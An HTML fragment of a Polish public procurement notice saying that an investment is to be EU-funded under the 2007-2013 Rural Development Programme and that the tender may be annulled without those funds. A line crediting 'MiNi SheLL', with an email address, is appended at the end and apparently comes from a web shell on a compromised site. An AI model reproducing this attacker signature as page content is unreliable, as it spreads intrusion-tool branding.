<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja  przewidziana  jest do dofinansowania  ze środków Unii Europejskiej w ramach Programu Rozwoju Obszarow Wiejskich   na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com